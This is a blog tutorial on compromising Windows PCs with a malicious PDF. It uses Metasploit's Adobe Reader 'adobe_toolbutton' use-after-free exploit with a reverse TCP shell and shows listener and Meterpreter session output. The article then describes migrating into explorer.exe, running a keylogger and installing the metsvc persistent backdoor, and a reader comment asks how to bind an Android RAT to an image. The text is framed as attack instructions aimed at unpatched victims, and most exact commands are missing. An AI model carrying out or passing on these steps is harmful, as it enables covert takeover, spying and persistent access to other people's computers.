Home » Articles » How to Compromise a PC with PDF Document
Click Here To Hide Tor

How to Compromise a PC with PDF Document

In one of my previous articles, I analysed how embedded JavaScript can be leveraged by hackers in order to exploit a system (in .svg image). PDF documents can be used just like .svg images, but sometimes there are better options which is the topic for this article.

Every year, security researchers find several vulnerabilities of that type and PDF readers patch them as soon as they find out. Once the vulnerabilities are public, there is a brief period (about 1 week) in which this attack vector is effective because some people didn’t update their software.

In this article, I’ll demonstrate how hackers can exploit the fact that many people don’t patch their programs on time resulting in remote code execution.

When a victim opens the malicious document there are 2 possible scenarios:

  1. The victim hasn’t patched their PDF reader and the exploit works – the attacker can run arbitrary code on the victim’s machine. Of course, if the attacker has found an unknown vulnerability (0-day), he can compromise the victim’s PC even if the PDF reader software is up to date.
  2. The victim has patched their PDF reader and the exploit doesn’t work.

Let’s create a PDF document that will create a backdoor once the document is opened with old and vulnerable version of Adobe Reader.

I’ll use Metasploit on Kali Linux to do the heavy lifting. The goal is to get a terminal on the victims computer to own the device.

Exploit Information

First, start the msfconsole and choose an exploit. This self-explanatory search demonstrates how to find the best exploit for your case.

search type:exploit platform:windows adobe pdf

I chose Adobe Reader ‘adobe_toolbutton’ Use-After-Free vulnerability. This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Adobe Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

Use-After-Free specifically refers to the attempt to access memory after it has been freed, which can cause a program to crash or, in the case of a Use-After-Free flaw, can potentially result in the execution of arbitrary code or even enable full remote code execution capabilities.

The specific flaw exists within the handling of the callbacks associated with ToolButton objects. A reference to the ToolButton object is kept when executing a callback which can lead to a use-after-free scenario if the callback removes the ToolButton object. An attacker can leverage this situation to execute code under the context of the user.

Creating Payload

  1. Choose the exploit:
Now, show options command should show possible targets for this exploit:

2. Set file name (optinonal):

This can be done later when you change the document to look legit. If you already have a prepared pdf document, you can use set infilename <path-to-file> to embed the payload on it.

3. Choose payload – reverse TCP shell for Windows in our case, but of course this can be custom or any other Metasploit payload. With reverse shell we can use other payloads whenever we want, so that’s our choice.

4. Set IP address and PORT (any unused port is good) to connect back to:

5. Create PDF document with payload: exploit

Use show options command for troubleshooting, this is what is should look like:

Wait for the victim to connect back to you

As you can see, the PDF document is created. Before we send it, we need to start a listener on that port:

[*] Started reverse handler on 10.0.2.15:10000

[*] Starting the payload handler…

Just make sure to put the same IP and port you did when you created the pdf and this will start a listener. Once a victim opens the document in a vulnerable version of Adobe this will happen on attacker’s machine:

[*] Sending stage (770048 bytes) to <Target IP>

[*] Meterpreter session 1 opened (10.0.10.15:10000 -> <Target IP>:1138) at 2016-12-19 19:03:43 -0500 meterpreter >

Migrate Meterpreter to another process

Once “meterpreter >” shows, we own the victim’s machine. Now, we can start a keylogger, browse the disk etc. Now it would be useful to migrate to explorer.exe process in case our process gets closed:

Making the backdoor persistent

After going through all the hard work of exploiting a system, it’s often a good idea to leave yourself an easier way back into the system later. This way, if the service you exploited is down or patched, you can still gain access to the system.

Using the metsvc backdoor, you can gain a Meterpreter shell at any point.

This is how you activate the metsvc to get a Meterpreter session (shell):

Immediately after entering exploit, we get a Meterpreter session just like before.

3 comments

  1. Always update ALL the software of your computers! Keep your application/software installed “lean”, flush unused stuff.

    Don’t install software you find on the internet; Always use software from valid sources and check MD5 hashing if possible.

    And preferably, use open source software. Avoid any Microsoft Windows versions at all cost.

  2. plz tell about how to bind android rat to image and make persistence?????????????

Leave a Reply

Your email address will not be published. Required fields are marked *

*

Captcha: *